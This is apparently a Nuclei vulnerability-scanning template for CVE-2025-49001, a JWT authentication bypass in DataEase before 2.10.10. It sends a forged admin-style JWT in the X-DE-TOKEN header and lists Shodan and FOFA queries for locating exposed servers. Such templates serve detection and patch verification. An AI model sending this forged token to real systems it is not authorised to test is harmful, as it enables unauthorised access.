id: CVE-2025-49001 info: name: DataEase < 2.10.10 - JWT Authentication Bypass author: YunSeoJo,aryu-ru severity: critical description: | DataEase < 2.10.10 contains a broken authentication caused by ineffective secret verification, letting users forge JWT tokens, exploit requires no special privileges. impact: | Users can forge JWT tokens, potentially gaining unauthorized access to the system. remediation: | Update to version 2.10.10 or later. reference: - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r - https://github.com/dataease/dataease - https://nvd.nist.gov/vuln/detail/CVE-2025-49001 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-49001 cwe-id: CWE-287 epss-score: 0.21265 epss-percentile: 0.97332 metadata: verified: true max-request: 2 vendor: dataease product: dataease shodan-query: http.title:"DataEase" fofa-query: title="DataEase" tags: cve,cve2025,dataease,auth-bypass,jwt,unauth flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/de2api/user/info" matchers: - type: dsl dsl: - 'status_code == 401' - 'contains(body, "token is empty")' condition: and internal: true - raw: - | GET /de2api/user/info HTTP/1.1 Host: {{Hostname}} X-DE-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsIm9pZCI6MSwiZXhwIjo5OTk5OTk5OTk5fQ.tDSRWgqgE9BTy9NDpTE0ZAI2GKxOFPllYz-jOJu635A matchers-condition: and matchers: - type: status status: - 400 - type: word part: header words: - "de-gateway-flag" - "hmacsha256" condition: and case-insensitive: true - type: word part: body words: - "getWriter() has already been called" extractors: - type: kval part: header kval: - x_de_execute_version # digest: 4a0a00473045022024718460a69711d06a27d167b66a8a2402770cedd7db61d15bcdbb6dc49f00ae022100fc25ae3928148bbcd5192db3d498c91ccd1a8c28d908927dc24930138cc0435b:922c64590222798bb761d5b6d8e72950